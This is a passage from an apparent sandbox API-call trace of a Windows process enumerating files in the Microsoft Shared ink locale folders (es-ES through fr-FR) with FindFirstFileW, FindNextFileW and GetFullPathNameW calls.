ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tabskb.dll.mui", cAlternateFileName="")) returned 1 [0045.107] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipBand.dll.mui", cAlternateFileName="")) returned 1 [0045.107] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipRes.dll.mui", cAlternateFileName="")) returned 1 [0045.107] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5cd75ed, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe5f38bbd, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5f38bbd, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0045.108] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipTsf.dll.mui", cAlternateFileName="")) returned 1 [0045.108] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipTsf.dll.mui", cAlternateFileName="")) returned 0 [0045.108] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0045.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0045.108] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES", lpFilePart=0x0) returned 0x38 [0045.108] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0045.108] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.108] CoTaskMemFree (pv=0x4fe370) [0045.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.108] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES", lpFilePart=0x0) returned 0x38 [0045.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0045.108] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES", lpFilePart=0x0) returned 0x38 [0045.109] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\", lpFilePart=0x0) returned 0x39 [0045.109] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0045.109] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.109] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe41519b8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe41519b8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0045.109] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0045.109] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0045.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0045.110] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0045.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0045.110] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES", lpFilePart=0x0) returned 0x38 [0045.110] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\", lpFilePart=0x0) returned 0x39 [0045.110] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0045.110] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.110] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe41519b8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe41519b8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0045.110] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe41519b8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe41519b8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0045.110] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0045.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0045.111] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE", lpFilePart=0x0) returned 0x38 [0045.111] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0045.111] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.111] CoTaskMemFree (pv=0x4fe370) [0045.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.111] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE", lpFilePart=0x0) returned 0x38 [0045.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0045.111] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE", lpFilePart=0x0) returned 0x38 [0045.111] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\", lpFilePart=0x0) returned 0x39 [0045.111] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0045.118] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.118] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb4e9cfd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeb74b2cd, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeb74b2cd, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0045.118] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0045.118] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0045.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0045.118] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0045.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0045.118] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE", lpFilePart=0x0) returned 0x38 [0045.118] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\", lpFilePart=0x0) returned 0x39 [0045.119] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0045.119] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.119] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb4e9cfd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeb74b2cd, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeb74b2cd, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0045.119] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb4e9cfd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeb74b2cd, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeb74b2cd, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0045.119] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0045.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0045.119] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI", lpFilePart=0x0) returned 0x38 [0045.119] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0045.119] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.119] CoTaskMemFree (pv=0x4fe370) [0045.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.120] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI", lpFilePart=0x0) returned 0x38 [0045.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0045.120] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI", lpFilePart=0x0) returned 0x38 [0045.120] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\", lpFilePart=0x0) returned 0x39 [0045.120] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0045.120] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.120] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47dd5b4, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4a64ce1, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4a64ce1, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0045.121] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0045.121] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0045.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0045.121] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0045.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0045.121] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI", lpFilePart=0x0) returned 0x38 [0045.121] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\", lpFilePart=0x0) returned 0x39 [0045.121] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0045.121] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.121] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47dd5b4, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4a64ce1, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4a64ce1, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0045.122] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47dd5b4, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4a64ce1, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4a64ce1, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0045.122] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0045.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0045.122] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR", 